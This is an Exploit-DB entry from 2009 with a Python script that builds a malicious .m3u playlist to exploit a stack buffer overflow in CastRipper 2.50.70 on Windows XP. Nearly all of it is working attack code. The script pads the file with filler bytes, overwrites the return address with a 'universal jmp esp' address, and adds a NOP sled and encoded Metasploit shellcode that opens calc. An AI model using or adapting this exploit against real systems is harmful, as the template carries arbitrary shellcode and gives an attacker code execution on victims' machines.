CastRipper 2.50.70 - '.m3u' Universal Stack Overflow

EDB-ID:

8662




Platform:

Windows

Date:

2009-05-12


#!/usr/bin/python
print "**************************************************************************"
print " CastRipper 2.50.70 (.m3u) Universal Stack Overflow Exploit\n"
print " Refer: http://www.milw0rm.com/exploits/8660\n"
print " Exploit code: super-cristal\n"
print " Tested on: Windows XP Pro SP3\n"
print " Greetings to:"
print " His0k4, all friends & muslims HaCkers(dz),snakespc.com\n"
print "**************************************************************************"
     

# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com	 
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x44\x4e\x53\x4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48"
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x38"
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x35\x4e\x41\x41\x50\x4b\x4e\x4b\x38\x4e\x31\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x38\x42\x34\x42\x43\x45\x38\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x54\x4e\x50\x4b\x38\x42\x57\x4e\x31\x4d\x4a"
"\x4b\x58\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b"
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x46\x4e\x53\x4f\x35\x41\x43"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x55\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x58\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x36\x41\x46"
"\x4e\x46\x43\x36\x42\x50\x5a")

buff =  "\x41" * 17367
buff += "\x7D\xBC\x01\x10" # universal jmp esp
buff += "\x90"*20
buff += shellcode

try:
    out_file = open("exploit.m3u",'w')
    out_file.write(buff)
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2009-05-12]